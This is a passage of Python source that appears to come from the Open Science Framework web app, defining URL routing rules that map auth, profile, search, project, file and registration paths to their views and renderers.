'profile_url': cas.get_profile_url(),
'enable_institutions': settings.ENABLE_INSTITUTIONS,
'keen_project_id': settings.KEEN_PROJECT_ID,
'keen_write_key': settings.KEEN_WRITE_KEY,
}
def is_private_link_anonymous_view():
try:
# Avoid circular import
from website.project.model import PrivateLink
return PrivateLink.find_one(
Q('key', 'eq', request.args.get('view_only'))
).anonymous
except QueryException:
return False
class OsfWebRenderer(WebRenderer):
"""Render a Mako template with OSF context vars.
:param trust: Optional. If ``False``, markup-safe escaping will be enabled
"""
def __init__(self, *args, **kwargs):
kwargs['data'] = get_globals
super(OsfWebRenderer, self).__init__(*args, **kwargs)
#: Use if a view only redirects or raises error
notemplate = OsfWebRenderer('', renderer=render_mako_string, trust=False)
# Static files (robots.txt, etc.)
def favicon():
return send_from_directory(
settings.STATIC_FOLDER,
'favicon.ico',
mimetype='image/vnd.microsoft.icon'
)
def robots():
"""Serves the robots.txt file."""
# Allow local robots.txt
if os.path.exists(os.path.join(settings.STATIC_FOLDER,
'robots.local.txt')):
robots_file = 'robots.local.txt'
else:
robots_file = 'robots.txt'
return send_from_directory(
settings.STATIC_FOLDER,
robots_file,
mimetype='text/plain'
)
def goodbye():
# Redirect to dashboard if logged in
if _get_current_user():
return redirect(util.web_url_for('index'))
status.push_status_message(language.LOGOUT, kind='success', trust=False)
return {}
def make_url_map(app):
"""Set up all the routes for the OSF app.
:param app: A Flask/Werkzeug app to bind the rules to.
"""
# Set default views to 404, using URL-appropriate renderers
process_rules(app, [
Rule(
'/<path:_>',
['get', 'post'],
HTTPError(http.NOT_FOUND),
OsfWebRenderer('', render_mako_string, trust=False)
),
Rule(
'/api/v1/<path:_>',
['get', 'post'],
HTTPError(http.NOT_FOUND),
json_renderer
),
])
### GUID ###
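    # A GUID is resolved to whatever object it refers to; both the web and
    # the /api/v1 variants are handled by website_views.resolve_guid.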
process_rules(app, [
Rule(
[
'/<guid>/',
'/<guid>/<path:suffix>',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid,
notemplate,
),
Rule(
[
'/api/v1/<guid>/',
'/api/v1/<guid>/<path:suffix>',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid,
json_renderer,
),
])
# Static files
process_rules(app, [
Rule('/favicon.ico', 'get', favicon, json_renderer),
Rule('/robots.txt', 'get', robots, json_renderer),
])
### Base ###
process_rules(app, [
Rule(
'/dashboard/',
'get',
website_views.redirect_to_home,
OsfWebRenderer('home.mako', trust=False)
),
Rule(
'/myprojects/',
'get',
website_views.dashboard,
OsfWebRenderer('dashboard.mako', trust=False)
),
Rule(
'/reproducibility/',
'get',
website_views.reproducibility,
notemplate
),
Rule('/about/', 'get', website_views.redirect_about, notemplate),
Rule('/faq/', 'get', {}, OsfWebRenderer('public/pages/faq.mako', trust=False)),
Rule(['/getting-started/', '/getting-started/email/', '/howosfworks/'], 'get', website_views.redirect_getting_started, notemplate),
Rule('/support/', 'get', {}, OsfWebRenderer('public/pages/support.mako', trust=False)),
Rule(
'/explore/',
'get',
{},
OsfWebRenderer('public/explore.mako', trust=False)
),
Rule(
[
'/messages/',
'/help/'
],
'get',
{},
OsfWebRenderer('public/comingsoon.mako', trust=False)
),
Rule(
'/view/<meeting>/',
'get',
conference_views.conference_results,
OsfWebRenderer('public/pages/meeting.mako', trust=False),
),
Rule(
'/view/<meeting>/plain/',
'get',
conference_views.conference_results,
OsfWebRenderer('public/pages/meeting_plain.mako', trust=False),
endpoint_suffix='__plain',
),
Rule(
'/api/v1/view/<meeting>/',
'get',
conference_views.conference_data,
json_renderer,
),
Rule(
'/meetings/',
'get',
conference_views.conference_view,
OsfWebRenderer('public/pages/meeting_landing.mako', trust=False),
),
Rule(
'/api/v1/meetings/submissions/',
'get',
conference_views.conference_submissions,
json_renderer,
),
Rule(
'/presentations/',
'get',
conference_views.redirect_to_meetings,
json_renderer,
),
Rule(
'/news/',
'get',
{},
OsfWebRenderer('public/pages/news.mako', trust=False)
),
Rule(
'/prereg/',
'get',
prereg.prereg_landing_page,
OsfWebRenderer('prereg_landing_page.mako', trust=False)
),
Rule(
'/preprints/',
'get',
preprint_views.preprint_landing_page,
OsfWebRenderer('public/pages/preprint_landing.mako', trust=False),
),
Rule(
'/preprint/',
'get',
preprint_views.preprint_redirect,
notemplate,
),
Rule(
'/api/v1/prereg/draft_registrations/',
'get',
prereg.prereg_draft_registrations,
json_renderer,
),
])
# Site-wide API routes
process_rules(app, [
Rule(
'/citations/styles/',
'get',
citation_views.list_citation_styles,
json_renderer,
),
], prefix='/api/v1')
process_rules(app, [
Rule(
[
'/project/<pid>/<addon>/settings/disable/',
'/project/<pid>/node/<nid>/<addon>/settings/disable/',
],
'post',
addon_views.disable_addon,
json_renderer,
),
Rule(
'/profile/<uid>/<addon>/settings/',
'get',
addon_views.get_addon_user_config,
json_renderer,
),
], prefix='/api/v1')
# OAuth
process_rules(app, [
Rule(
'/oauth/connect/<service_name>/',
'get',
oauth_views.oauth_connect,
json_renderer,
),
Rule(
'/oauth/callback/<service_name>/',
'get',
oauth_views.oauth_callback,
OsfWebRenderer('util/oauth_complete.mako', trust=False),
),
])
process_rules(app, [
Rule(
[
'/oauth/accounts/<external_account_id>/',
],
'delete',
oauth_views.oauth_disconnect,
json_renderer,
)
], prefix='/api/v1')
### Metadata ###
process_rules(app, [
Rule(
[
'/project/<pid>/comments/timestamps/',
'/project/<pid>/node/<nid>/comments/timestamps/',
],
'put',
project_views.comment.update_comments_timestamp,
json_renderer,
),
Rule(
[
'/project/<pid>/citation/',
'/project/<pid>/node/<nid>/citation/',
],
'get',
citation_views.node_citation,
json_renderer,
),
], prefix='/api/v1')
### Forms ###
process_rules(app, [
Rule('/forms/registration/', 'get', website_views.registration_form, json_renderer),
Rule('/forms/signin/', 'get', website_views.signin_form, json_renderer),
Rule('/forms/forgot_password/', 'get', website_views.forgot_password_form, json_renderer),
Rule('/forms/reset_password/', 'get', website_views.reset_password_form, json_renderer),
], prefix='/api/v1')
### Discovery ###
process_rules(app, [
Rule(
'/explore/activity/',
'get',
discovery_views.activity,
OsfWebRenderer('public/pages/active_nodes.mako', trust=False)
),
])
### Auth ###
# Web
process_rules(app, [
Rule(
'/confirm/<uid>/<token>/',
'get',
auth_views.confirm_email_get,
# View will either redirect or display error message
notemplate
),
Rule(
'/resetpassword/<verification_key>/',
['get', 'post'],
auth_views.reset_password,
OsfWebRenderer('public/resetpassword.mako', render_mako_string, trust=False)
),
# Resend confirmation URL linked to in CAS login page
Rule(
'/resend/',
['get', 'post'],
auth_views.resend_confirmation,
OsfWebRenderer('resend.mako', render_mako_string, trust=False)
),
# TODO: Remove `auth_register_post`
Rule(
'/register/',
'post',
auth_views.auth_register_post,
OsfWebRenderer('public/login.mako', trust=False)
),
Rule('/api/v1/register/', 'post', auth_views.register_user, json_renderer),
Rule(
[
'/login/',
'/account/'
],
'get',
auth_views.auth_login,
OsfWebRenderer('public/login.mako', trust=False)
),
Rule(
'/login/first/',
'get',
auth_views.auth_login,
OsfWebRenderer('public/login.mako', trust=False),
endpoint_suffix='__first', view_kwargs={'first': True}
),
Rule(
'/logout/',
'get',
auth_views.auth_logout,
notemplate
),
Rule(
'/forgotpassword/',
'get',
auth_views.forgot_password_get,
OsfWebRenderer('public/forgot_password.mako', trust=False)
),
Rule(
'/forgotpassword/',
'post',
auth_views.forgot_password_post,
OsfWebRenderer('public/login.mako', trust=False)
),
Rule(
[
'/midas/',
'/summit/',
'/accountbeta/',
'/decline/'
],
'get',
auth_views.auth_registerbeta,
notemplate
),
# FIXME or REDIRECTME: This redirects to settings when logged in, but gives an error (no template) when logged out
Rule(
'/login/connected_tools/',
'get',
landing_page_views.connected_tools,
OsfWebRenderer('public/login_landing.mako', trust=False)
),
# FIXME or REDIRECTME: mod-meta error when logged out: signin form not rendering for login_landing sidebar
Rule(
'/login/enriched_profile/',
'get',
landing_page_views.enriched_profile,
OsfWebRenderer('public/login_landing.mako', trust=False)
),
])
### Profile ###
# Web
process_rules(app, [
Rule(
'/profile/',
'get',
profile_views.profile_view,
OsfWebRenderer('profile.mako', trust=False)
),
Rule(
'/profile/<uid>/',
'get',
profile_views.profile_view_id,
OsfWebRenderer('profile.mako', trust=False)
),
Rule(
['/user/merge/'],
'get',
auth_views.merge_user_get,
OsfWebRenderer('merge_accounts.mako', trust=False)
),
Rule(
['/user/merge/'],
'post',
auth_views.merge_user_post,
OsfWebRenderer('merge_accounts.mako', trust=False)
),
# Route for claiming and setting email and password.
# Verification token must be querystring argument
Rule(
['/user/<uid>/<pid>/claim/'],
['get', 'post'],
project_views.contributor.claim_user_form,
OsfWebRenderer('claim_account.mako', trust=False)
),
Rule(
['/user/<uid>/<pid>/claim/verify/<token>/'],
['get', 'post'],
project_views.contributor.claim_user_registered,
OsfWebRenderer('claim_account_registered.mako', trust=False)
),
Rule(
'/settings/',
'get',
profile_views.user_profile,
OsfWebRenderer('profile/settings.mako', trust=False),
),
Rule(
'/settings/account/',
'get',
profile_views.user_account,
OsfWebRenderer('profile/account.mako', trust=False),
),
Rule(
'/settings/account/password',
'post',
profile_views.user_account_password,
OsfWebRenderer('profile/account.mako', trust=False),
),
Rule(
'/settings/addons/',
'get',
profile_views.user_addons,
OsfWebRenderer('profile/addons.mako', trust=False),
),
Rule(
'/settings/notifications/',
'get',
profile_views.user_notifications,
OsfWebRenderer('profile/notifications.mako', trust=False),
),
Rule(
'/settings/applications/',
'get',
profile_views.oauth_application_list,
OsfWebRenderer('profile/oauth_app_list.mako', trust=False)
),
Rule(
'/settings/applications/create/',
'get',
profile_views.oauth_application_register,
OsfWebRenderer('profile/oauth_app_detail.mako', trust=False)
),
Rule(
'/settings/applications/<client_id>/',
'get',
profile_views.oauth_application_detail,
OsfWebRenderer('profile/oauth_app_detail.mako', trust=False)
),
Rule(
'/settings/tokens/',
'get',
profile_views.personal_access_token_list,
OsfWebRenderer('profile/personal_tokens_list.mako', trust=False)
),
Rule(
'/settings/tokens/create/',
'get',
profile_views.personal_access_token_register,
OsfWebRenderer('profile/personal_tokens_detail.mako', trust=False)
),
Rule(
'/settings/tokens/<_id>/',
'get',
profile_views.personal_access_token_detail,
OsfWebRenderer('profile/personal_tokens_detail.mako', trust=False)
),
# TODO: Uncomment once outstanding issues with this feature are addressed
# Rule(
# '/@<twitter_handle>/',
# 'get',
# profile_views.redirect_to_twitter,
# OsfWebRenderer('error.mako', render_mako_string, trust=False)
# ),
])
# API
process_rules(app, [
Rule('/profile/', 'get', profile_views.profile_view, json_renderer),
Rule('/profile/', 'put', profile_views.update_user, json_renderer),
Rule('/resend/', 'put', profile_views.resend_confirmation, json_renderer),
Rule('/profile/<uid>/', 'get', profile_views.profile_view_id, json_renderer),
# Used by profile.html
Rule('/profile/<uid>/edit/', 'post', profile_views.edit_profile, json_renderer),
Rule('/profile/<uid>/public_projects/', 'get',
profile_views.get_public_projects, json_renderer),
Rule('/profile/<uid>/public_components/', 'get',
profile_views.get_public_components, json_renderer),
Rule('/profile/<user_id>/summary/', 'get',
profile_views.get_profile_summary, json_renderer),
Rule('/user/<uid>/<pid>/claim/email/', 'post',
project_views.contributor.claim_user_post, json_renderer),
Rule(
'/profile/export/',
'post',
profile_views.request_export,
json_renderer,
),
Rule(
'/profile/deactivate/',
'post',
profile_views.request_deactivation,
json_renderer,
),
Rule(
[
'/profile/gravatar/',
'/users/gravatar/',
'/profile/gravatar/<size>',
'/users/gravatar/<size>',
],
'get',
profile_views.current_user_gravatar,
json_renderer,
),
Rule(
[
'/profile/<uid>/gravatar/',
'/users/<uid>/gravatar/',
'/profile/<uid>/gravatar/<size>',
'/users/<uid>/gravatar/<size>',
],
'get',
profile_views.get_gravatar,
json_renderer,
),
# Rules for user profile configuration
Rule('/settings/names/', 'get', profile_views.serialize_names, json_renderer),
Rule('/settings/names/', 'put', profile_views.unserialize_names, json_renderer),
Rule('/settings/names/impute/', 'get', profile_views.impute_names, json_renderer),
Rule(
[
'/settings/social/',
'/settings/social/<uid>/',
],
'get',
profile_views.serialize_social,
json_renderer,
),
Rule(
[
'/settings/jobs/',
'/settings/jobs/<uid>/',
],
'get',
profile_views.serialize_jobs,
json_renderer,
),
Rule(
[
'/settings/schools/',
'/settings/schools/<uid>/',
],
'get',
profile_views.serialize_schools,
json_renderer,
),
Rule(
[
'/settings/social/',
'/settings/social/<uid>/',
],
'put',
profile_views.unserialize_social,
json_renderer
),
Rule(
[
'/settings/jobs/',
'/settings/jobs/<uid>/',
],
'put',
profile_views.unserialize_jobs,
json_renderer
),
Rule(
[
'/settings/schools/',
'/settings/schools/<uid>/',
],
'put',
profile_views.unserialize_schools,
json_renderer
),
], prefix='/api/v1',)
### Search ###
# Web
process_rules(app, [
Rule(
'/search/',
'get',
{},
OsfWebRenderer('search.mako', trust=False)
),
Rule(
'/share/',
'get',
{},
OsfWebRenderer('share_search.mako', trust=False)
),
Rule(
'/share/registration/',
'get',
{'register': settings.SHARE_REGISTRATION_URL},
OsfWebRenderer('share_registration.mako', trust=False)
),
Rule(
'/share/help/',
'get',
{'help': settings.SHARE_API_DOCS_URL},
OsfWebRenderer('share_api_docs.mako', trust=False)
),
Rule( # FIXME: Dead route; possible that template never existed; confirm deletion candidate with ErinB
'/share_dashboard/',
'get',
{},
OsfWebRenderer('share_dashboard.mako', trust=False)
),
Rule(
'/share/atom/',
'get',
search_views.search_share_atom,
xml_renderer
),
Rule('/api/v1/user/search/', 'get', search_views.search_contributor, json_renderer),
Rule(
'/api/v1/search/node/',
'post',
project_views.node.search_node,
json_renderer,
),
])
# API
process_rules(app, [
Rule(['/search/', '/search/<type>/'], ['get', 'post'], search_views.search_search, json_renderer),
Rule('/search/projects/', 'get', search_views.search_projects_by_title, json_renderer),
Rule('/share/search/', ['get', 'post'], search_views.search_share, json_renderer),
Rule('/share/stats/', 'get', search_views.search_share_stats, json_renderer),
Rule('/share/providers/', 'get', search_views.search_share_providers, json_renderer),
], prefix='/api/v1')
# Institution
process_rules(app, [
Rule('/institutions/<inst_id>/', 'get', institution_views.view_institution, OsfWebRenderer('institution.mako', trust=False))
])
# Project
# Web
process_rules(app, [
# '/' route loads home.mako if logged in, otherwise loads landing.mako
Rule('/', 'get', website_views.index, OsfWebRenderer('index.mako', trust=False)),
Rule('/goodbye/', 'get', goodbye, OsfWebRenderer('landing.mako', trust=False)),
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'get',
project_views.node.view_project,
OsfWebRenderer('project/project.mako', trust=False)
),
# Create a new subproject/component
Rule(
'/project/<pid>/newnode/',
'post',
project_views.node.project_new_node,
notemplate
),
# # TODO: Add API endpoint for tags
# Rule('/tags/<tag>/', 'get', project_views.tag.project_tag, OsfWebRenderer('tags.mako', trust=False)),
Rule('/project/new/<pid>/beforeTemplate/', 'get',
project_views.node.project_before_template, json_renderer),
Rule(
[
'/project/<pid>/contributors/',
'/project/<pid>/node/<nid>/contributors/',
],
'get',
project_views.node.node_contributors,
OsfWebRenderer('project/contributors.mako', trust=False),
),
Rule(
[
'/project/<pid>/settings/',
'/project/<pid>/node/<nid>/settings/',
],
'get',
project_views.node.node_setting,
OsfWebRenderer('project/settings.mako', trust=False)
),
# Permissions
Rule( # TODO: Where, if anywhere, is this route used?
[
'/project/<pid>/permissions/<permissions>/',
'/project/<pid>/node/<nid>/permissions/<permissions>/',
],
'post',
project_views.node.project_set_privacy,
OsfWebRenderer('project/project.mako', trust=False)
),
### Logs ###
# View forks
Rule(
[
'/project/<pid>/forks/',
'/project/<pid>/node/<nid>/forks/',
],
'get',
project_views.node.node_forks,
OsfWebRenderer('project/forks.mako', trust=False)
),
# Registrations
Rule(
[
'/project/<pid>/register/',
'/project/<pid>/node/<nid>/register/',
],
'get',
project_views.register.node_register_page,
OsfWebRenderer('project/register.mako', trust=False)
),
Rule(
[
'/project/<pid>/register/<metaschema_id>/',
'/project/<pid>/node/<nid>/register/<metaschema_id>/',
],
'get',
project_views.register.node_register_template_page,
OsfWebRenderer('project/register.mako', trust=False)
),
Rule(
[
'/project/<pid>/registrations/',
'/project/<pid>/node/<nid>/registrations/',
],
'get',
project_views.node.node_registrations,
OsfWebRenderer('project/registrations.mako', trust=False)
),
Rule(
[
'/project/<pid>/registrations/',
'/project/<pid>/node/<nid>/registrations/',
],
'post',
project_views.drafts.new_draft_registration,
OsfWebRenderer('project/edit_draft_registration.mako', trust=False)),
Rule(
[
'/project/<pid>/drafts/<draft_id>/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/',
],
'get',
project_views.drafts.edit_draft_registration_page,
OsfWebRenderer('project/edit_draft_registration.mako', trust=False)),
Rule(
[
'/project/<pid>/drafts/<draft_id>/register/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/register/',
],
'get',
project_views.drafts.draft_before_register_page,
OsfWebRenderer('project/register_draft.mako', trust=False)),
Rule(
[
'/project/<pid>/retraction/',
'/project/<pid>/node/<nid>/retraction/',
],
'get',
project_views.register.node_registration_retraction_redirect,
notemplate,
),
Rule(
[
'/project/<pid>/withdraw/',
'/project/<pid>/node/<nid>/withdraw/',
],
'get',
project_views.register.node_registration_retraction_get,
OsfWebRenderer('project/retract_registration.mako', trust=False)
),
Rule(
'/ids/<category>/<path:value>/',
'get',
project_views.register.get_referent_by_identifier,
notemplate,
),
# Statistics
Rule(
[
'/project/<pid>/statistics/',
'/project/<pid>/node/<nid>/statistics/',
],
'get',
project_views.node.project_statistics_redirect,
notemplate,
),
Rule(
[
'/project/<pid>/analytics/',
'/project/<pid>/node/<nid>/analytics/',
],
'get',
project_views.node.project_statistics,
OsfWebRenderer('project/statistics.mako', trust=False)
),
### Files ###
# Note: Web endpoint for files view must pass `mode` = `page` to
# include project view data and JS includes
# TODO: Start waterbutler to test
Rule(
[
'/project/<pid>/files/',
'/project/<pid>/node/<nid>/files/',
],
'get',
project_views.file.collect_file_trees,
OsfWebRenderer('project/files.mako', trust=False),
view_kwargs={'mode': 'page'},
),
Rule(
[
'/project/<pid>/files/<provider>/<path:path>/',
'/project/<pid>/node/<nid>/files/<provider>/<path:path>/',
],
'get',
addon_views.addon_view_or_download_file,
OsfWebRenderer('project/view_file.mako', trust=False)
),
Rule(
[
'/project/<pid>/files/deleted/<trashed_id>/',
'/project/<pid>/node/<nid>/files/deleted/<trashed_id>/',
],
'get',
addon_views.addon_deleted_file,
OsfWebRenderer('project/view_file.mako', trust=False)
),
Rule(
[
# Legacy Addon view file paths
'/project/<pid>/<provider>/files/<path:path>/',
'/project/<pid>/node/<nid>/<provider>/files/<path:path>/',
'/project/<pid>/<provider>/files/<path:path>/download/',
'/project/<pid>/node/<nid>/<provider>/files/<path:path>/download/',
# Legacy routes for `download_file`
'/project/<pid>/osffiles/<fid>/download/',
'/project/<pid>/node/<nid>/osffiles/<fid>/download/',
# Legacy routes for `view_file`
'/project/<pid>/osffiles/<fid>/',
'/project/<pid>/node/<nid>/osffiles/<fid>/',
# Note: Added these old URLs for backwards compatibility with
# hard-coded links.
'/project/<pid>/osffiles/download/<fid>/',
'/project/<pid>/node/<nid>/osffiles/download/<fid>/',
'/project/<pid>/files/<fid>/',
'/project/<pid>/node/<nid>/files/<fid>/',
'/project/<pid>/files/download/<fid>/',
'/project/<pid>/node/<nid>/files/download/<fid>/',
# Legacy routes for `download_file_by_version`
'/project/<pid>/osffiles/<fid>/version/<vid>/download/',
'/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/download/',
# Note: Added these old URLs for backwards compatibility with
# hard-coded links.
'/project/<pid>/osffiles/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/',
'/project/<pid>/osffiles/download/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/osffiles/download/<fid>/version/<vid>/',
'/project/<pid>/files/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/files/<fid>/version/<vid>/',
'/project/<pid>/files/download/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/files/download/<fid>/version/<vid>/',
],
'get',
addon_views.addon_view_or_download_file_legacy,
OsfWebRenderer('project/view_file.mako', trust=False),
),
Rule(
[
# api/v1 Legacy routes for `download_file`
'/api/v1/project/<pid>/osffiles/<fid>/',
'/api/v1/project/<pid>/node/<nid>/osffiles/<fid>/',
'/api/v1/project/<pid>/files/download/<fid>/',
'/api/v1/project/<pid>/node/<nid>/files/download/<fid>/',
                # api/v1 Legacy routes for `download_file_by_version`
'/api/v1/project/<pid>/osffiles/<fid>/version/<vid>/',
'/api/v1/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/',
'/api/v1/project/<pid>/files/download/<fid>/version/<vid>/',
'/api/v1/project/<pid>/node/<nid>/files/download/<fid>/version/<vid>/',
],
'get',
addon_views.addon_view_or_download_file_legacy,
json_renderer
),
])
# API
process_rules(app, [
Rule(
'/email/meeting/',
'post',
conference_views.meeting_hook,
json_renderer,
),
Rule('/mailchimp/hooks/', 'get', profile_views.mailchimp_get_endpoint, json_renderer),
Rule('/mailchimp/hooks/', 'post', profile_views.sync_data_from_mailchimp, json_renderer),
# Create project, used by [coming replacement]
Rule('/project/new/', 'post', project_views.node.project_new_post, json_renderer),
Rule([
'/project/<pid>/contributors_abbrev/',
'/project/<pid>/node/<nid>/contributors_abbrev/',
], 'get', project_views.contributor.get_node_contributors_abbrev, json_renderer),
Rule('/tags/<tag>/', 'get', project_views.tag.project_tag, json_renderer),
Rule([
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
], 'get', project_views.node.view_project, json_renderer),
Rule(
[
'/project/<pid>/pointer/',
'/project/<pid>/node/<nid>/pointer/',
],
'get',
project_views.node.get_pointed,
json_renderer,
),
Rule(
[
'/project/<pid>/pointer/',
'/project/<pid>/node/<nid>/pointer/',
],
'post',
project_views.node.add_pointers,
json_renderer,
),
Rule(
[
'/pointer/',
],
'post',
project_views.node.add_pointer,
json_renderer,
),
Rule(
[
'/pointers/move/',
],
'post',
project_views.node.move_pointers,
json_renderer,
),
Rule(
[
'/project/<pid>/pointer/',
                '/project/<pid>/node/<nid>/pointer/',
],
'delete',
project_views.node.remove_pointer,
json_renderer,
),
Rule(
[
'/folder/<pid>/pointer/<pointer_id>',
],
'delete',
project_views.node.remove_pointer_from_folder,
json_renderer,
),
Rule([
'/project/<pid>/get_summary/',
'/project/<pid>/node/<nid>/get_summary/',
], 'get', project_views.node.get_summary, json_renderer),
Rule([
'/project/<pid>/get_children/',
'/project/<pid>/node/<nid>/get_children/',
], 'get', project_views.node.get_children, json_renderer),
Rule([
'/project/<pid>/get_forks/',
'/project/<pid>/node/<nid>/get_forks/',
], 'get', project_views.node.get_forks, json_renderer),
Rule([
'/project/<pid>/get_registrations/',
'/project/<pid>/node/<nid>/get_registrations/',
], 'get', project_views.node.get_registrations, json_renderer),
# Draft Registrations
Rule([
'/project/<pid>/drafts/',
], 'get', project_views.drafts.get_draft_registrations, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'get', project_views.drafts.get_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'put', project_views.drafts.update_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'delete', project_views.drafts.delete_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/submit/',
], 'post', project_views.drafts.submit_draft_for_review, json_renderer),
# Meta Schemas
Rule([
'/project/drafts/schemas/',
], 'get', project_views.drafts.get_metaschemas, json_renderer),
Rule('/log/<log_id>/', 'get', project_views.log.get_log, json_renderer),
Rule([
'/project/<pid>/log/',
'/project/<pid>/node/<nid>/log/',
], 'get', project_views.log.get_logs, json_renderer),
Rule([
'/project/<pid>/get_contributors/',
'/project/<pid>/node/<nid>/get_contributors/',
], 'get', project_views.contributor.get_contributors, json_renderer),
Rule([
'/project/<pid>/get_contributors_from_parent/',
'/project/<pid>/node/<nid>/get_contributors_from_parent/',
], 'get', project_views.contributor.get_contributors_from_parent, json_renderer),
# Reorder contributors
Rule(
[
'/project/<pid>/contributors/manage/',
'/project/<pid>/node/<nid>/contributors/manage/',
],
'POST',
project_views.contributor.project_manage_contributors,
json_renderer,
),
Rule(
[
'/project/<pid>/contributor/remove/',
'/project/<pid>/node/<nid>/contributor/remove/',
],
'POST',
project_views.contributor.project_remove_contributor,
json_renderer,
),
Rule([
'/project/<pid>/get_editable_children/',
'/project/<pid>/node/<nid>/get_editable_children/',
], 'get', project_views.node.get_editable_children, json_renderer),
# Private Link
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'post', project_views.node.project_generate_private_link_post, json_renderer),
Rule([
'/project/<pid>/private_link/edit/',
'/project/<pid>/node/<nid>/private_link/edit/',
], 'put', project_views.node.project_private_link_edit, json_renderer),
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'delete', project_views.node.remove_private_link, json_renderer),
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'get', project_views.node.private_link_table, json_renderer),
# Create, using existing project as a template
Rule([
'/project/new/<nid>/',
], 'post', project_views.node.project_new_from_template, json_renderer),
# Update
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'put',
project_views.node.update_node,
json_renderer,
),
# Remove
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'delete',
project_views.node.component_remove,
json_renderer,
),
# Reorder components
Rule('/project/<pid>/reorder_components/', 'post',
project_views.node.project_reorder_components, json_renderer),
# Edit node
Rule([
'/project/<pid>/edit/',
'/project/<pid>/node/<nid>/edit/',
], 'post', project_views.node.edit_node, json_renderer),
# Add / remove tags
Rule([
'/project/<pid>/tags/',
'/project/<pid>/node/<nid>/tags/',
'/project/<pid>/tags/<tag>/',
'/project/<pid>/node/<nid>/tags/<tag>/',
], 'post', project_views.tag.project_add_tag, json_renderer),
Rule([
'/project/<pid>/tags/',
'/project/<pid>/node/<nid>/tags/',
'/project/<pid>/tags/<tag>/',
'/project/<pid>/node/<nid>/tags/<tag>/',
], 'delete', project_views.tag.project_remove_tag, json_renderer),
# Add / remove contributors
Rule([
'/project/<pid>/contributors/',
'/project/<pid>/node/<nid>/contributors/',
], 'post', project_views.contributor.project_contributors_post, json_renderer),
# Forks
Rule(
[
'/project/<pid>/fork/before/',
'/project/<pid>/node/<nid>/fork/before/',
], 'get', project_views.node.project_before_fork, json_renderer,
),
Rule(
[
'/project/<pid>/fork/',
'/project/<pid>/node/<nid>/fork/',
], 'post', project_views.node.node_fork_page, json_renderer,
),
Rule(
[
'/project/<pid>/pointer/fork/',
'/project/<pid>/node/<nid>/pointer/fork/',
], 'post', project_views.node.fork_pointer, json_renderer,
),
# View forks
Rule([
'/project/<pid>/forks/',
'/project/<pid>/node/<nid>/forks/',
], 'get', project_views.node.node_forks, json_renderer),
# Registrations
Rule([
'/project/<pid>/beforeregister/',
'/project/<pid>/node/<nid>/beforeregister',
], 'get', project_views.register.project_before_register, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/register/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/register/',
], 'post', project_views.drafts.register_draft_registration, json_renderer),
Rule([
'/project/<pid>/register/<template>/',
'/project/<pid>/node/<nid>/register/<template>/',
], 'get', project_views.register.node_register_template_page, json_renderer),
Rule([
'/project/<pid>/withdraw/',
'/project/<pid>/node/<nid>/withdraw/'
], 'post', project_views.register.node_registration_retraction_post, json_renderer),
Rule(
[
'/project/<pid>/identifiers/',
'/project/<pid>/node/<nid>/identifiers/',
],
'get',
project_views.register.node_identifiers_get,
json_renderer,
),
Rule(
[
'/project/<pid>/identifiers/',
'/project/<pid>/node/<nid>/identifiers/',
],
'post',
project_views.register.node_identifiers_post,
json_renderer,
),
# Statistics
Rule([
'/project/<pid>/statistics/',
'/project/<pid>/node/<nid>/statistics/',
], 'get', project_views.node.project_statistics, json_renderer),
# Permissions
Rule([
'/project/<pid>/permissions/<permissions>/',
'/project/<pid>/node/<nid>/permissions/<permissions>/',
], 'post', project_views.node.project_set_privacy, json_renderer),
Rule([
'/project/<pid>/permissions/beforepublic/',
'/project/<pid>/node/<nid>/permissions/beforepublic/',
], 'get', project_views.node.project_before_set_public, json_renderer),
### Watching ###
Rule([
'/project/<pid>/watch/',
'/project/<pid>/node/<nid>/watch/'
], 'post', project_views.node.watch_post, json_renderer),
Rule([
'/project/<pid>/unwatch/',
'/project/<pid>/node/<nid>/unwatch/'
], 'post', project_views.node.unwatch_post, json_renderer),
Rule([
'/project/<pid>/togglewatch/',
'/project/<pid>/node/<nid>/togglewatch/'
], 'post', project_views.node.togglewatch_post, json_renderer),
Rule([
'/watched/logs/'
], 'get', website_views.watched_logs_get, json_renderer),
### Accounts ###
Rule([
'/user/merge/'
], 'post', auth_views.merge_user_post, json_renderer),
# Combined files
Rule(
[
'/project/<pid>/files/',
'/project/<pid>/node/<nid>/files/'
],
'get',
project_views.file.collect_file_trees,
json_renderer,
),
# Endpoint to fetch Rubeus.JS/Hgrid-formatted data
Rule(
[
'/project/<pid>/files/grid/',
'/project/<pid>/node/<nid>/files/grid/'
],
'get',
project_views.file.grid_data,
json_renderer
),
# Settings
Rule(
'/files/auth/',
'get',
addon_views.get_auth,
json_renderer,
),
Rule(
[
'/project/<pid>/waterbutler/logs/',
'/project/<pid>/node/<nid>/waterbutler/logs/',
],
'put',
addon_views.create_waterbutler_log,
json_renderer,
),
Rule(
[
'/registration/<pid>/callbacks/',
],
'put',
project_views.register.registration_callbacks,
json_renderer,
),
Rule(
'/settings/addons/',
'post',
profile_views.user_choose_addons,
json_renderer,
),
Rule(
'/settings/notifications/',
'get',
profile_views.user_notifications,
json_renderer,
),
Rule(
'/settings/notifications/',
